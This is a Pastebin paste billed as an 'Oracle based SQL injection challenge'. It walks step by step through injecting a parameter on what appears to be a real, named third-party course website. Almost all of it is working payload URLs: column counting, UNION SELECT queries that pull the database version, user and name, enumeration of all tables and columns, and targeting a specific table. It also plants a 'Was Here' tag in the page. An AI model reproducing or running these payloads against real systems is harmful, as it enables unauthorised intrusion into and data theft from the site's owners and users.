Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Oracle based Sqli Challenge BY GrenXPaRTa
- lets BEGIN::
- https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=44
- https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=44' more errors
- https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=44'-- not balanced
- https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=44--
- https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=44 ORDER BY 1--
- https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=44 ORDER BY 2-- more errors seems 1 column
- https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=-44 UNION SELECT NULL FROM dual-- No columns shown lets increase columns to 2
- https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=-44 UNION SELECT 'test',NULL FROM dual-- we saw test it means column 1 is vuln column
- https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=-44 UNION SELECT (SELECT banner FROM v$version WHERE rownum=1),NULL FROM dual-- We saw version Oracle Database 11g
- https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=-44 UNION SELECT USER,NULL FROM dual-- We saw user lets get database
- https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=-44 UNION SELECT sys.database_name,NULL FROM dual--
- We saw DATABASE name lets USE ALL at once We cant USE || AND + challenge rules so lers USE concat inside another concat
- concat(concat(1,2),2) LIKE that lets GET ALL concat(concat(concat(concat(concat(concat('<font color=red>GrenXPaRTa Was Here</font><br>Version::',(SELECT banner FROM v$version WHERE rownum=1)),'<br>User::'),USER),'<br>Database::'),sys.database_name),'<br>')
- https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=-44 UNION SELECT concat(concat(concat(concat(concat(concat('GrenXPaRTa Was Here<br>Version::',(SELECT banner FROM v$version WHERE rownum=1)),'<br>User::'),USER),'<br>Database::'),sys.database_name),'<br>'),NULL FROM dual-- Lets get all tables
- https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=-44 UNION SELECT TABLE_NAME,NULL FROM all_tables-- We get many tables lets get all columns
- https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=-44 UNION SELECT column_name,NULL FROM all_tab_columns-- We get all columns now lets extract for a table
- https://sv032.basauri.net/cursos/detalle-curso-vista.php?idc=-44 UNION SELECT column_name,NULL FROM all_tab_columns WHERE TABLE_NAME='AADATOSTRAZA'--
- Thanks TO ALL Friend Member SQL Injection
- ✍🏻✍🏻✍🏻
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement